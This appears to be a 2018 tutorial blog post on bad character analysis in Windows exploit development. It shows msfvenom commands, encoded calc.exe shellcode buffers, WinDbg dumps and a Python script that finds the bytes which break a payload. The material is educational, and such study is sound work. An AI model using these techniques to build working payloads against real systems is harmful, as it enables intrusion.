Thursday, January 25, 2018

Beginning Windows Exploit Development - Understanding Bad Character Analysis

One of the things that pisses me off as I'm trying to expand my knowledge on exploit development is having everything "working" and then my shellcode not executing. I mean I have my shellcode, I have my jump address, etc., but the shellcode does not execute.

One of the things I learned here is that "bad characters" can have a significant impact on whether your shellcode runs at all.

As a result, for this post I'm expanding my knowledge of bad character analysis.

At this point I'm looking to execute "calc.exe". So first up, run msfvenom without the bad characters command line option.

root@kali:~# msfvenom --platform Windows --arch x86 --payload windows/exec CMD="calc.exe" --smallest --encoder x86/shikata_ga_nai --format c --iterations 1 

Found 1 compatible encoders
Attempting to encode payload with 1 iterations of x86/shikata_ga_nai
x86/shikata_ga_nai succeeded with size 220 (iteration=0)
x86/shikata_ga_nai chosen with final size 220
Payload size: 220 bytes
Final size of c file: 949 bytes
unsigned char buf[] = 
"\xd9\xc1\xd9\x74\x24\xf4\xbf\x89\xfa\x6f\xea\x5b\x33\xc9\xb1"
"\x31\x31\x7b\x18\x03\x7b\x18\x83\xc3\x8d\x18\x9a\x16\x65\x5e"
"\x65\xe7\x75\x3f\xef\x02\x44\x7f\x8b\x47\xf6\x4f\xdf\x0a\xfa"
"\x24\x8d\xbe\x89\x49\x1a\xb0\x3a\xe7\x7c\xff\xbb\x54\xbc\x9e"
"\x3f\xa7\x91\x40\x7e\x68\xe4\x81\x47\x95\x05\xd3\x10\xd1\xb8"
"\xc4\x15\xaf\x00\x6e\x65\x21\x01\x93\x3d\x40\x20\x02\x36\x1b"
"\xe2\xa4\x9b\x17\xab\xbe\xf8\x12\x65\x34\xca\xe9\x74\x9c\x03"
"\x11\xda\xe1\xac\xe0\x22\x25\x0a\x1b\x51\x5f\x69\xa6\x62\xa4"
"\x10\x7c\xe6\x3f\xb2\xf7\x50\xe4\x43\xdb\x07\x6f\x4f\x90\x4c"
"\x37\x53\x27\x80\x43\x6f\xac\x27\x84\xe6\xf6\x03\x00\xa3\xad"
"\x2a\x11\x09\x03\x52\x41\xf2\xfc\xf6\x09\x1e\xe8\x8a\x53\x74"
"\xef\x19\xee\x3a\xef\x21\xf1\x6a\x98\x10\x7a\xe5\xdf\xac\xa9"
"\x42\x2f\xe7\xf0\xe2\xb8\xae\x60\xb7\xa4\x50\x5f\xfb\xd0\xd2"
"\x6a\x83\x26\xca\x1e\x86\x63\x4c\xf2\xfa\xfc\x39\xf4\xa9\xfd"
"\x6b\x97\x2c\x6e\xf7\x76\xcb\x16\x92\x86"

Looking at this in memory we see:

0:000> d 0012fd64 l dc
0012fd64  cc cc cc cc 10 01 b1 f1-90 90 90 90 90 d9 c1 d9  ................
0012fd74  74 24 f4 bf 89 fa 6f ea-5b 33 c9 b1 31 31 7b 18  t$....o.[3..11{.
0012fd84  03 7b 18 83 c3 8d 18 9a-16 65 5e 65 e7 75 3f ef  .{.......e^e.u?.
0012fd94  02 44 7f 8b 47 f6 4f df-3c 07 00 00 ec fd 12 00  .D..G.O.<.......
0012fda4  52 89 49 00 74 c4 4a 00-88 fd 12 00 08 00 00 00  R.I.t.J.........
0012fdb4  00 00 aa 00 ec fd 12 00-02 00 00 00 00 00 00 00  ................
0012fdc4  00 00 00 00 00 00 00 00-5d ae 49 00 4c fe 12 00  ........].I.L...
0012fdd4  24 0a aa 00 00 00 00 00-00 00 00 00 00 00 00 00  $...............
0012fde4  4c fe 12 00 ba ca 48 00-c1 ca 48 00 dc 93 4a 00  L.....H...H...J.
0012fdf4  02 00 00 00 d0 fe 12 00-00 00 00 00 20 fe 12 00  ............ ...
0012fe04  82 cd 48 00 00 00 00 00-00 00 00 00 00 00 00 00  ..H.............
0012fe14  20 d6 aa 00 80 ec aa 00-c8 fe 12 00 71 fb 41 00   ...........q.A.
0012fe24  48 c1 aa 00 08 d4 49 00-08 1f 14 00 78 28 a8 00  H.....I.....x(..
0012fe34  00 00 00 00 00 00 00 00-00 00 00 00              ............

From the dump above we can already see 00 bytes, which is already a no-no. Additionally, the '\x0a' that can be found in the 3rd row of the raw shellcode in the script is not in the memory dump output: the bytes in memory stop matching the shellcode right after the '\xdf' that precedes it, and nothing after that point made it in. At this point we have two bad characters, "\x00" and "\x0a".

Running msfvenom with the bad characters option, we get below:

root@kali:~# msfvenom --platform Windows --arch x86 --payload windows/exec CMD="calc.exe" --smallest --encoder x86/shikata_ga_nai --format c --iterations 1 --bad-chars '\x00\x0a'
Found 1 compatible encoders
Attempting to encode payload with 1 iterations of x86/shikata_ga_nai
x86/shikata_ga_nai succeeded with size 220 (iteration=0)
x86/shikata_ga_nai chosen with final size 220
Payload size: 220 bytes
Final size of c file: 949 bytes
unsigned char buf[] = 
"\xba\xb3\x4e\x5e\xa8\xdb\xdd\xd9\x74\x24\xf4\x58\x2b\xc9\xb1"
"\x31\x31\x50\x13\x83\xe8\xfc\x03\x50\xbc\xac\xab\x54\x2a\xb2"
"\x54\xa5\xaa\xd3\xdd\x40\x9b\xd3\xba\x01\x8b\xe3\xc9\x44\x27"
"\x8f\x9c\x7c\xbc\xfd\x08\x72\x75\x4b\x6f\xbd\x86\xe0\x53\xdc"
"\x04\xfb\x87\x3e\x35\x34\xda\x3f\x72\x29\x17\x6d\x2b\x25\x8a"
"\x82\x58\x73\x17\x28\x12\x95\x1f\xcd\xe2\x94\x0e\x40\x79\xcf"
"\x90\x62\xae\x7b\x99\x7c\xb3\x46\x53\xf6\x07\x3c\x62\xde\x56"
"\xbd\xc9\x1f\x57\x4c\x13\x67\x5f\xaf\x66\x91\x9c\x52\x71\x66"
"\xdf\x88\xf4\x7d\x47\x5a\xae\x59\x76\x8f\x29\x29\x74\x64\x3d"
"\x75\x98\x7b\x92\x0d\xa4\xf0\x15\xc2\x2d\x42\x32\xc6\x76\x10"
"\x5b\x5f\xd2\xf7\x64\xbf\xbd\xa8\xc0\xcb\x53\xbc\x78\x96\x39"
"\x43\x0e\xac\x0f\x43\x10\xaf\x3f\x2c\x21\x24\xd0\x2b\xbe\xef"
"\x95\xc4\xf4\xb2\xbf\x4c\x51\x27\x82\x10\x62\x9d\xc0\x2c\xe1"
"\x14\xb8\xca\xf9\x5c\xbd\x97\xbd\x8d\xcf\x88\x2b\xb2\x7c\xa8"
"\x79\xd1\xe3\x3a\xe1\x38\x86\xba\x80\x44";

Looking at the dump in memory again:

0:000> d 0012fd64 l dc
0012fd64  cc cc cc cc 10 01 b1 f1-90 90 90 90 90 ba b3 4e  ...............N
0012fd74  5e a8 db dd d9 74 24 f4-58 2b c9 b1 31 31 50 13  ^....t$.X+..11P.
0012fd84  83 e8 fc 03 50 bc ac ab-54 2a b2 54 a5 aa d3 dd  ....P...T*.T....
0012fd94  40 9b d3 ba 01 8b e3 c9-44 27 8f 9c 7c bc fd 08  @.......D'..|...
0012fda4  72 75 4b 6f bd 86 e0 53-dc 04 fb 87 3e 35 34 da  ruKo...S....>54.
0012fdb4  3f 72 29 17 6d 2b 25 8a-82 58 73 17 28 12 95 1f  ?r).m+%..Xs.(...
0012fdc4  cd e2 94 0e 40 79 cf 90-62 ae 7b 99 7c b3 46 53  ....@y..b.{.|.FS
0012fdd4  f6 07 3c 62 de 56 bd c9-1f 57 4c 13 67 5f af 66  ..<b.V...WL.g_.f
0012fde4  91 9c 52 71 66 df 88 f4-7d 47 5a ae 59 76 8f 29  ..Rqf...}GZ.Yv.)
0012fdf4  29 74 64 3d 75 98 7b 92-00 00 00 00 20 fe 12 00  )td=u.{..... ...
0012fe04  82 cd 48 00 00 00 00 00-00 00 00 00 00 00 00 00  ..H.............
0012fe14  20 d6 aa 00 80 ec aa 00-c8 fe 12 00 71 fb 41 00   ...........q.A.
0012fe24  48 c1 aa 00 08 d4 49 00-08 1f 14 00 78 28 a8 00  H.....I.....x(..
0012fe34  00 00 00 00 00 00 00 00-00 00 00 00              ............

At this point we don't see the "\x0d" from line 6 of the original shellcode in the memory dump; the bytes in memory stop matching right before it. Time to regenerate the shellcode, this time with "\x00", "\x0a" and "\x0d" as bad characters.

root@kali:~# msfvenom --platform Windows --arch x86 --payload windows/exec CMD="calc.exe" --smallest --encoder x86/shikata_ga_nai --format c --iterations 1 --bad-chars '\x00\x0a\x0d'
Found 1 compatible encoders
Attempting to encode payload with 1 iterations of x86/shikata_ga_nai
x86/shikata_ga_nai succeeded with size 220 (iteration=0)
x86/shikata_ga_nai chosen with final size 220
Payload size: 220 bytes
Final size of c file: 949 bytes
unsigned char buf[] = 
"\xdb\xd6\xbd\x45\xe1\xbe\xfa\xd9\x74\x24\xf4\x58\x2b\xc9\xb1"
"\x31\x83\xe8\xfc\x31\x68\x14\x03\x68\x51\x03\x4b\x06\xb1\x41"
"\xb4\xf7\x41\x26\x3c\x12\x70\x66\x5a\x56\x22\x56\x28\x3a\xce"
"\x1d\x7c\xaf\x45\x53\xa9\xc0\xee\xde\x8f\xef\xef\x73\xf3\x6e"
"\x73\x8e\x20\x51\x4a\x41\x35\x90\x8b\xbc\xb4\xc0\x44\xca\x6b"
"\xf5\xe1\x86\xb7\x7e\xb9\x07\xb0\x63\x09\x29\x91\x35\x02\x70"
"\x31\xb7\xc7\x08\x78\xaf\x04\x34\x32\x44\xfe\xc2\xc5\x8c\xcf"
"\x2b\x69\xf1\xe0\xd9\x73\x35\xc6\x01\x06\x4f\x35\xbf\x11\x94"
"\x44\x1b\x97\x0f\xee\xe8\x0f\xf4\x0f\x3c\xc9\x7f\x03\x89\x9d"
"\xd8\x07\x0c\x71\x53\x33\x85\x74\xb4\xb2\xdd\x52\x10\x9f\x86"
"\xfb\x01\x45\x68\x03\x51\x26\xd5\xa1\x19\xca\x02\xd8\x43\x80"
"\xd5\x6e\xfe\xe6\xd6\x70\x01\x56\xbf\x41\x8a\x39\xb8\x5d\x59"
"\x7e\x36\x14\xc0\xd6\xdf\xf1\x90\x6b\x82\x01\x4f\xaf\xbb\x81"
"\x7a\x4f\x38\x99\x0e\x4a\x04\x1d\xe2\x26\x15\xc8\x04\x95\x16"
"\xd9\x66\x78\x85\x81\x46\x1f\x2d\x23\x97"

Looking at the memory dump:

0:000> d 0012fd64 l ef
0012fd64  cc cc cc cc 10 01 b1 f1-90 90 90 90 90 db d6 bd  ................
0012fd74  45 e1 be fa d9 74 24 f4-58 2b c9 b1 31 83 e8 fc  E....t$.X+..1...
0012fd84  31 68 14 03 68 51 03 4b-06 b1 41 b4 f7 41 26 3c  1h..hQ.K..A..A&<
0012fd94  12 70 66 5a 56 22 56 28-3a ce 1d 7c af 45 53 a9  .pfZV"V(:..|.ES.
0012fda4  c0 ee de 8f ef ef 73 f3-6e 73 8e 20 51 4a 41 35  ......s.ns. QJA5
0012fdb4  90 8b bc b4 c0 44 ca 6b-f5 e1 86 b7 7e b9 07 b0  .....D.k....~...
0012fdc4  63 20 29 91 35 02 70 31-b7 c7 08 78 af 04 34 32  c ).5.p1...x..42
0012fdd4  44 fe c2 c5 8c cf 2b 69-f1 e0 d9 73 35 c6 01 06  D.....+i...s5...
0012fde4  4f 35 bf 11 94 44 1b 97-0f ee e8 0f f4 0f 3c c9  O5...D........<.
0012fdf4  7f 03 89 9d d8 07 0c 71-53 33 85 74 b4 b2 dd 52  .......qS3.t...R
0012fe04  10 9f 86 fb 01 45 68 03-51 26 d5 a1 19 ca 02 d8  .....Eh.Q&......
0012fe14  43 80 d5 6e fe e6 d6 70-01 56 bf 41 8a 39 b8 5d  C..n...p.V.A.9.]
0012fe24  59 7e 36 14 c0 d6 df f1-90 6b 82 01 4f af bb 81  Y~6......k..O...
0012fe34  7a 4f 38 99 0e 4a 04 1d-e2 26 15 c8 04 95 16 d9  zO8..J...&......
0012fe44  66 78 85 81 46 1f 2d 23-97 90 90 90 90 90 90     fx..F.-#.......


At this point it looks like we have a clean shellcode.
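The listing-versus-dump comparison done by eye above, automated as an added example (my own script, not part of the original post): it parses the bytes out of the msfvenom C listing and the rows of the WinDbg `d` output, finds the first byte that did not arrive in memory, and says whether that byte was stripped (the rest shifted up by one) or whether the copy stopped there. The sample data is copied from the first run above; the function names are my own and the dump parser assumes WinDbg's `d` row format as shown in the post.

```python
import re

# Constructed sample: the first msfvenom listing and the matching WinDbg rows from the post.
C_LISTING = r'''"\xd9\xc1\xd9\x74\x24\xf4\xbf\x89\xfa\x6f\xea\x5b\x33\xc9\xb1"
"\x31\x31\x7b\x18\x03\x7b\x18\x83\xc3\x8d\x18\x9a\x16\x65\x5e"
"\x65\xe7\x75\x3f\xef\x02\x44\x7f\x8b\x47\xf6\x4f\xdf\x0a\xfa"
'''
WINDBG_DUMP = '''
0012fd64  cc cc cc cc 10 01 b1 f1-90 90 90 90 90 d9 c1 d9  ................
0012fd74  74 24 f4 bf 89 fa 6f ea-5b 33 c9 b1 31 31 7b 18  t$....o.[3..11{.
0012fd84  03 7b 18 83 c3 8d 18 9a-16 65 5e 65 e7 75 3f ef  .{.......e^e.u?.
0012fd94  02 44 7f 8b 47 f6 4f df-3c 07 00 00 ec fd 12 00  .D..G.O.<.......
'''

def parse_c_buf(text):
    """Bytes of every \\xNN escape in an msfvenom --format c listing."""
    return bytes(int(h, 16) for h in re.findall(r'\\x([0-9a-fA-F]{2})', text))

def parse_windbg_dump(text):
    """(base address, bytes) from the rows of a WinDbg `d` command; the ASCII
    column and the '-' between byte 8 and 9 are ignored."""
    base, out = None, bytearray()
    for line in text.splitlines():
        m = re.match(r'^([0-9a-fA-F]{8})\s+((?:[0-9a-fA-F]{2}[ -]?){1,16})', line)
        if not m:
            continue
        if base is None:
            base = int(m.group(1), 16)
        out += bytes.fromhex(re.sub(r'[ -]', '', m.group(2)))
    return base, bytes(out)

def find_bad_char(shellcode, base, memory, probe=8):
    """Locate the shellcode in memory by its first `probe` bytes, then report the
    first byte that did not arrive: (address, offset, expected byte, verdict).
    Returns None when every byte is intact."""
    start = memory.find(shellcode[:probe])
    if start < 0:
        raise ValueError('shellcode prologue not found in dump')
    for i, b in enumerate(shellcode):
        if start + i < len(memory) and memory[start + i] == b:
            continue
        tail = shellcode[i + 1:i + 1 + probe]
        if tail and memory[start + i:start + i + len(tail)] == tail:
            verdict = 'stripped'    # byte dropped, the rest shifted up by one
        else:
            verdict = 'truncated'   # copy stopped (or data is garbage) from here on
        return base + start + i, i, b, verdict
    return None

if __name__ == '__main__':
    addr, off, byte, verdict = find_bad_char(parse_c_buf(C_LISTING), *parse_windbg_dump(WINDBG_DUMP))
    print(f'first bad byte \\x{byte:02x} at offset {off} (0x{addr:08x}): {verdict}')
```

Run it again with the second listing and dump to get the "\x0d" hit, and with the third to confirm the script returns None.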

References:
http://www.primalsecurity.net/0x7-exploit-tutorial-bad-character-analysis/
